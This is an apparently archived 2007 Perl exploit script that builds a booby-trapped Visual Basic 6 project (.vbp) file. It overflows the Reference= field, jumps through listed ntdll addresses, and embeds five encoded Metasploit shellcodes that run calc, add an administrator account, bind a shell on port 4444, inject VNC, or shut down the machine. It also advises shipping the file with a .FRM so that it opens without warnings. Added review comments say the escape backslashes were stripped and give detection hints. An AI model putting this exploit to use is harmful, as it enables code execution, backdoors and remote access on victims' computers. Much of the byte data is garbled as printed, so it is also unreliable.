# Title : Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit
# Published : 2007-09-04
# Author : Koshi
#!/usr/bin/perl
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'++ Author: Koshi +
#'++ Email: heykoshi at gmail dot com +
#'++ Application: Microsoft Visual Basic 6.0 +
#'++ +
#'++ Tested on Microsoft Windows XP Home Edition SP2 +
#'++ Patched & Updated +
#'++ +
#'++ The vulnerable buffer exists in the .VBP files of +
#'++ Visual Basic projects. You can jump directly to +
#'++ the shellcode, or jump to it via EBP. +
#'++ +
#'++ There is NO restriction of shellcode size either. +
#'++ +
#'++ Gr33tz: Rima my baby who I love and adore, Draven +
#'++ for pointing me in the right direction, as always. +
#'++ +
#'++ +
#'++ This exploit is for educational use only, blah. +
#'++ +
#'++ +
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# Ex. of Usage:
# perl vb6.pl 1 >>Project.vbp
#
#
# NOTE(review): every backslash of the escape sequences in this listing has
# been dropped by the archive ("x54x79..." where the source would read
# "\x54\x79...", and print "n" for a newline), so as printed the script emits
# the literal letters, not the bytes. Do not lift these strings verbatim into
# signatures or hashes.
#
# No `use strict; use warnings;` — everything below is a package global.
#
# Decoded, the fragments below assemble a Visual Basic 6 project (.vbp) text
# file whose "Reference=" value is padded far past its normal length and
# whose "Name=" value carries an encoded payload; the remaining keys are the
# ordinary ones the IDE writes, so the file otherwise looks like a real
# project.  Defensive artefact: a .vbp whose Reference= or Name= value runs
# to hundreds of bytes, or contains non-printable bytes, was not written by
# the VB6 IDE.
#
# $begin0 decodes to "Type=Exe\r\nForm=Form1.frm\r\n".
$begin0 = "x54x79x70x65x3Dx45x78x65x0Dx0Ax46x6Fx72x6D".
"x3Dx46x6Fx72x6Dx31x2Ex66x72x6Dx0Dx0A";
# $begin1 decodes to the stdole2 / OLE Automation reference line present in
# every VB6 project:
#   Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#
#     ..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
# The value is left open (no line terminator) so the filler and addresses
# that follow become part of this one field.
$begin1 = "x52x65x66x65x72x65x6Ex63x65x3D".
"x2Ax5Cx47x7Bx30x30x30x32x30x34x33x30x2Dx30".
"x30x30x30x2Dx30x30x30x30x2Dx43x30x30x30x2D".
"x30x30x30x30x30x30x30x30x30x30x34x36x7Dx23".
"x32x2Ex30x23x30x23x2Ex2Ex5Cx2Ex2Ex5Cx2Ex2E".
"x5Cx2Ex2Ex5Cx2Ex2Ex5Cx57x49x4Ex44x4Fx57x53".
"x5Cx73x79x73x74x65x6Dx33x32x5Cx73x74x64x6F".
"x6Cx65x32x2Ex74x6Cx62x23x4Fx4Cx45x20x41x75".
"x74x6Fx6Dx61x74x69x6Fx6E";
# $begin2 decodes to "\r\nStartup=\"Form1\"\r\nCommand32=\"\"" — it closes
# the Reference= line and resumes normal-looking project keys.
$begin2 = "x0Dx0Ax53x74x61x72x74x75x70x3Dx22x46x6Fx72x6Dx31x22x0Dx0A".
"x43x6Fx6Dx6Dx61x6Ex64x33x32x3Dx22x22";
# $BuffOf is the filler appended to the Reference= value: 27 lines of 18
# plus a final 4, i.e. 490 'A' (0x41) bytes as listed.  A Reference= value
# of this length is the simplest thing a parser-side check can reject.
$BuffOf = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41";
# Four bytes 83 25 40 01 (little-endian 0x01402583).  The author does not say
# what this slot is; presumably the overwritten return address — TODO confirm.
$codeAddr = "x83x25x40x01";
# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example.
# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# ...backwards..if you don't know why, then gtfo.
# Little-endian 0x7C923DA3, the XP SP2 English ntdll entry starred in the table
# above.  The address is tied to one unpatched ntdll build and language; that
# dependence is the whole reason the table exists.
$jmpEbp = "xA3x3Dx92x7C";
# "DDDD": a four-byte spacer between the address and the next VBP key.
$fourSkin = "x44x44x44x44";
# $begin3 decodes to "\r\nName=\"Project1" followed by 20 'A' bytes.  The
# Name= value is deliberately left unterminated so the payload string that is
# printed next ends up inside it; $endQuote closes it afterwards.
$begin3 = "x0Dx0Ax4Ex61x6Dx65x3Dx22x50x72x6Fx6Ax65x63".
"x74x31x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41";
# $koshi decodes to the remaining keys a stock VB6 project file carries
# (HelpContextID, CompatibleMode, MajorVer/MinorVer/RevisionVer,
# AutoIncrementVer, ServerSupportFiles, CompilationType, OptimizationType,
# FavorPentiumPro(tm), CodeViewDebugInfo, NoAliasing, BoundsCheck,
# OverflowCheck, FlPointCheck, FDIVCheck, UnroundedFP, StartMode, Unattended,
# Retained, ThreadPerObject, MaxNumberOfThreads=1, then the
# "[MS Transaction Server]" section with AutoRefresh=1).  It is cosmetic: it
# makes the output look like a normally saved project.
$koshi = "x0Dx0Ax48x65x6Cx70x43x6Fx6Ex74x65x78x74x49x44x3Dx22x30x22x0Dx0Ax43x6Fx6D".
"x70x61x74x69x62x6Cx65x4Dx6Fx64x65x3Dx22x30x22x0Dx0Ax4Dx61x6Ax6Fx72x56x65".
"x72x3Dx31x0Dx0Ax4Dx69x6Ex6Fx72x56x65x72x3Dx30x0Dx0Ax52x65x76x69x73x69x6F".
"x6Ex56x65x72x3Dx30x0Dx0Ax41x75x74x6Fx49x6Ex63x72x65x6Dx65x6Ex74x56x65x72".
"x3Dx30x0Dx0Ax53x65x72x76x65x72x53x75x70x70x6Fx72x74x46x69x6Cx65x73x3Dx30".
"x0Dx0Ax43x6Fx6Dx70x69x6Cx61x74x69x6Fx6Ex54x79x70x65x3Dx30x0Dx0Ax4Fx70x74".
"x69x6Dx69x7Ax61x74x69x6Fx6Ex54x79x70x65x3Dx30x0Dx0Ax46x61x76x6Fx72x50x65".
"x6Ex74x69x75x6Dx50x72x6Fx28x74x6Dx29x3Dx30x0Dx0Ax43x6Fx64x65x56x69x65x77".
"x44x65x62x75x67x49x6Ex66x6Fx3Dx30x0Dx0Ax4Ex6Fx41x6Cx69x61x73x69x6Ex67x3D".
"x30x0Dx0Ax42x6Fx75x6Ex64x73x43x68x65x63x6Bx3Dx30x0Dx0Ax4Fx76x65x72x66x6C".
"x6Fx77x43x68x65x63x6Bx3Dx30x0Dx0Ax46x6Cx50x6Fx69x6Ex74x43x68x65x63x6Bx3D".
"x30x0Dx0Ax46x44x49x56x43x68x65x63x6Bx3Dx30x0Dx0Ax55x6Ex72x6Fx75x6Ex64x65".
"x64x46x50x3Dx30x0Dx0Ax53x74x61x72x74x4Dx6Fx64x65x3Dx30x0Dx0Ax55x6Ex61x74".
"x74x65x6Ex64x65x64x3Dx30x0Dx0Ax52x65x74x61x69x6Ex65x64x3Dx30x0Dx0Ax54x68".
"x72x65x61x64x50x65x72x4Fx62x6Ax65x63x74x3Dx30x0Dx0Ax4Dx61x78x4Ex75x6Dx62".
"x65x72x4Fx66x54x68x72x65x61x64x73x3Dx31x0Dx0Ax0Dx0Ax5Bx4Dx53x20x54x72x61".
"x6Ex73x61x63x74x69x6Fx6Ex20x53x65x72x76x65x72x5Dx0Dx0Ax41x75x74x6Fx52x65".
"x66x72x65x73x68x3Dx31x0Dx0A";
# The five payloads below are Metasploit output, as their descriptor lines
# say.  With the PexAlphaNum encoder everything after the 10-byte decoder stub
# (eb 03 59 eb 05 e8 f8 ff ff ff) is in the printable 0x30-0x5A range, which
# is what lets them sit inside a text .vbp.  For detection: a Name= value that
# is a long run of such characters, or that begins with those stub bytes, is
# the observable artefact; all five share that stub.
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$shellc1 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38".
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48".
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58".
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44".
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38".
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47".
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b".
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33".
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37".
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59".
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56".
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a";
# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
# (Note the usage banner at the bottom lists the user and password the other
# way round; this descriptor line is the one that reflects the payload.)
$shellc2 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x50x42x30x4bx48x45x44x4ex53x4bx38x4ex37".
"x45x50x4ax47x41x50x4fx4ex4bx38x4fx54x4ax51x4bx58".
"x4fx35x42x52x41x30x4bx4ex49x54x4bx38x46x53x4bx48".
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x52x46x30x45x47x45x4ex4bx48".
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex50x4bx54".
"x4bx48x4fx55x4ex51x41x50x4bx4ex4bx58x4ex51x4bx58".
"x41x30x4bx4ex49x38x4ex55x46x42x46x30x43x4cx41x33".
"x42x4cx46x46x4bx58x42x34x42x53x45x48x42x4cx4ax37".
"x4ex30x4bx48x42x44x4ex30x4bx48x42x37x4ex51x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b".
"x42x30x42x30x42x50x4bx58x4ax36x4ex53x4fx45x41x53".
"x48x4fx42x36x48x45x49x38x4ax4fx43x48x42x4cx4bx57".
"x42x55x4ax56x42x4fx4cx58x46x50x4fx55x4ax46x4ax59".
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x36x4dx46".
"x46x56x50x42x45x36x4ax37x45x56x42x32x4fx52x43x46".
"x42x42x50x56x45x46x46x47x42x52x45x47x43x37x45x36".
"x44x57x42x42x46x53x46x36x4dx56x49x46x50x56x42x32".
"x4bx36x4fx36x43x37x4ax46x49x36x42x32x4fx42x41x34".
"x46x54x46x34x42x32x48x52x48x52x42x52x50x36x45x46".
"x46x57x42x42x4ex56x4fx36x43x36x41x36x4ex46x47x56".
"x44x37x4fx36x45x57x42x57x42x52x41x44x46x56x4dx56".
"x49x46x50x56x49x46x43x47x46x57x44x37x41x36x46x57".
"x4fx46x44x37x43x37x42x32x46x43x46x36x4dx56x49x36".
"x50x56x42x42x4fx32x41x44x46x54x46x54x42x50x5a";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
$shellc3 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38".
"x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx48x4ex37".
"x45x30x4ax47x41x30x4fx4ex4bx58x4fx44x4ax41x4bx58".
"x4fx45x42x52x41x50x4bx4ex49x44x4bx58x46x33x4bx48".
"x41x50x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c".
"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx33x46x35x46x32x4ax32x45x57x45x4ex4bx48".
"x4fx35x46x32x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx58x4fx35x4ex31x41x50x4bx4ex43x50x4ex52x4bx58".
"x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x33x4bx4d".
"x46x46x4bx48x43x34x42x53x4bx58x42x54x4ex30x4bx48".
"x42x57x4ex31x4dx4ax4bx48x42x44x4ax50x50x45x4ax46".
"x50x38x50x34x50x50x4ex4ex42x55x4fx4fx48x4dx48x46".
"x43x45x48x56x4ax36x43x53x44x33x4ax46x47x57x43x37".
"x44x53x4fx55x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e".
"x48x36x41x58x4dx4ex4ax50x44x30x45x45x4cx36x44x50".
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x45".
"x4fx4fx48x4dx43x45x43x45x43x55x43x55x43x55x43x54".
"x43x45x43x54x43x45x4fx4fx42x4dx48x46x4ax36x41x31".
"x4ex35x48x46x43x55x49x58x41x4ex45x59x4ax46x46x4a".
"x4cx41x42x47x47x4cx47x35x4fx4fx48x4dx4cx46x42x31".
"x41x55x45x55x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32".
"x49x4ex47x55x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d".
"x4ax56x45x4ex49x44x48x38x49x34x47x55x4fx4fx48x4d".
"x42x45x46x45x46x45x45x35x4fx4fx42x4dx43x59x4ax36".
"x47x4ex49x47x48x4cx49x37x47x35x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x56x4cx36x46x56x48x46x4ax36x43x46".
"x4dx36x49x38x45x4ex4cx46x42x35x49x45x49x32x4ex4c".
"x49x48x47x4ex4cx56x46x54x49x48x44x4ex41x43x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x54x4ex42".
"x43x59x4dx38x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36".
"x44x47x50x4fx43x4bx48x41x4fx4fx45x47x46x54x4fx4f".
"x48x4dx4bx45x47x45x44x35x41x35x41x45x41x55x4cx46".
"x41x30x41x45x41x45x45x45x41x45x4fx4fx42x4dx4ax36".
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx56".
"x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx48x47x35x4ex4f".
"x43x38x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d".
"x4ax56x42x4fx4cx58x46x50x4fx55x43x45x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
$shellc4 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ax4ex48x55x42x50".
"x42x30x42x30x43x55x45x35x48x45x47x45x4bx38x4ex36".
"x46x42x4ax31x4bx38x45x54x4ex33x4bx48x46x55x45x30".
"x4ax47x41x50x4cx4ex4bx58x4cx54x4ax31x4bx48x4cx55".
"x42x42x41x50x4bx4ex43x4ex44x43x49x54x4bx58x46x33".
"x4bx48x41x30x50x4ex41x33x4fx4fx4ex4fx41x43x42x4c".
"x4ex4ax4ax53x42x4ex46x57x47x30x41x4cx4fx4cx4dx30".
"x41x30x47x4cx4bx4ex44x4fx4bx33x4ex47x46x42x46x51".
"x45x37x41x4ex4bx38x4cx35x46x52x41x30x4bx4ex48x56".
"x4bx58x4ex50x4bx54x4bx48x4cx55x4ex51x41x30x4bx4e".
"x4bx58x46x30x4bx58x41x50x4ax4ex4bx4ex44x50x41x43".
"x42x4cx4fx35x50x35x4dx35x4bx45x44x4cx4ax50x42x50".
"x50x55x4cx36x42x33x49x55x46x46x4bx58x49x31x4bx38".
"x4bx45x4ex50x4bx38x4bx35x4ex31x4bx48x4bx51x4bx58".
"x4bx45x4ax30x43x55x4ax56x50x38x50x34x50x50x4ex4e".
"x4fx4fx48x4dx49x48x47x4cx41x58x4ex4ex42x50x41x50".
"x42x50x42x30x47x45x48x55x43x45x49x38x45x4ex4ax4e".
"x47x52x42x30x42x30x42x30x42x59x41x50x42x30x42x50".
"x48x4bx49x51x4ax51x47x4ex46x4ax49x31x42x47x49x4e".
"x45x4ex49x54x48x58x49x54x46x4ax4cx51x42x37x47x4c".
"x46x4ax4dx4ax50x42x49x4ex49x4dx49x50x45x4fx4dx4a".
"x4bx4cx4dx4ex4ex4fx4bx43x47x45x43x35x44x33x4fx45".
"x43x33x44x43x42x30x4bx45x4dx38x4bx34x42x42x41x55".
"x4fx4fx47x4dx49x58x4fx4dx49x38x43x4cx4dx58x45x47".
"x46x41x4cx36x47x30x49x45x41x35x43x45x4fx4fx46x43".
"x4fx38x4fx4fx45x35x46x50x49x35x49x58x46x50x50x48".
"x44x4ex44x4fx4bx32x47x52x46x35x4fx4fx47x43x4fx4f".
"x45x35x42x43x41x53x42x4cx42x45x42x35x42x35x42x55".
"x42x54x42x55x42x44x42x35x4fx4fx45x45x4ex32x49x48".
"x47x4cx41x53x4bx4dx43x45x43x45x4ax46x44x30x42x50".
"x41x31x4ex55x49x48x42x4ex4cx36x42x31x42x35x47x55".
"x4fx4fx45x35x46x32x43x55x47x45x4fx4fx45x45x4ax32".
"x43x55x46x35x47x45x4fx4fx45x55x42x32x49x48x47x4c".
"x41x58x4ex4ex42x50x42x31x42x50x42x50x49x58x43x4e".
"x4cx46x42x50x4ax46x42x30x42x51x42x30x42x30x43x35".
"x47x45x4fx4fx45x35x4ax31x41x58x4ex4ex42x30x46x30".
"x42x30x42x30x4fx4fx43x4dx5a";
# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
$shellc5 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x50x42x30x4bx38x45x54x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx38x4fx54x4ax51x4bx48".
"x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx48".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c".
"x46x47x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x30x45x37x45x4ex4bx38".
"x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx34".
"x4bx38x4fx45x4ex31x41x30x4bx4ex4bx38x4ex31x4bx48".
"x41x50x4bx4ex49x48x4ex35x46x32x46x50x43x4cx41x43".
"x42x4cx46x56x4bx48x42x34x42x43x45x58x42x4cx4ax37".
"x4ex50x4bx38x42x34x4ex50x4bx38x42x57x4ex51x4dx4a".
"x4bx58x4ax36x4ax50x4bx4ex49x30x4bx58x42x58x42x4b".
"x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx45x41x53".
"x48x4fx42x36x48x35x49x48x4ax4fx43x58x42x4cx4bx37".
"x42x45x4ax56x42x4fx4cx48x46x30x4fx55x4ax56x4ax39".
"x50x4fx4cx58x50x50x47x45x4fx4fx47x4ex43x37x4ax56".
"x45x47x46x37x46x46x4fx36x47x37x50x46x42x42x4dx42".
"x43x36x42x42x44x42x4ax34x41x54x49x34x42x42x48x35".
"x45x34x50x56x42x33x4dx56x42x52x42x57x47x57x50x56".
"x43x33x46x36x42x32x4cx46x42x33x42x33x44x37x42x32".
"x44x46x42x53x4ax57x42x33x44x47x42x52x47x47x49x56".
"x48x46x42x52x4bx56x42x33x43x57x4ax56x41x53x42x32".
"x45x37x42x32x44x56x41x43x46x37x43x46x4ax56x44x32".
"x42x30x5a";
# A single '"' that terminates the Name= value opened in $begin3.
$endQuote = "x22";
# Option number from the command line.  It is not validated: a missing or
# non-numeric argument numifies to 0, matches none of the branches and falls
# through to the usage banner (the numeric == on a string would only warn
# under `use warnings`, which is not enabled).
$i = $ARGV[0];
# Five branches that differ only in which payload is placed in the Name=
# slot; the field order in every print is the same:
#   Type/Form, Reference= (+ filler + two addresses + spacer), Startup/
#   Command32, Name= + payload + closing quote, remaining project keys.
# Output goes to STDOUT; the usage text expects the caller to redirect it.
if ($i==1){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
exit;
}
if ($i==2){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
exit;
}
if ($i==3){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
exit;
}
if ($i==4){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
exit;
}
if ($i==5){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
exit;
}
# Usage banner.  Every trailing "n" (and the "x22" in option 5) is a newline
# or quote escape whose backslash the archive stripped; as listed these print
# as literal letters.
print "n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print " +++ +++n";
print " +++ +++n";
print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++n";
print " +++ Written By Koshi +++n";
print " +++ Greets: Rima my baby! Draven, thanks for helping. +++n";
print " +++ +++n";
print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++n";
print " +++ +++n";
print " +++ Options: +++n";
print " +++ 1 - win32_exec CALC.EXE +++n";
print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++n";
print " +++ 3 - win32_bind Port 4444 +++n";
print " +++ 4 - win32_bind_vncinject Port 5900 +++n";
print " +++ 5 - win32_exec shutdown -c x22HAI VEn0m pw.. +++n";
print " +++ +++n";
print " +++ +++n";
print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++n";
print " +++ warnings in Visual Basic 6.0 +++n";
print " +++ +++n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
exit;
#EOF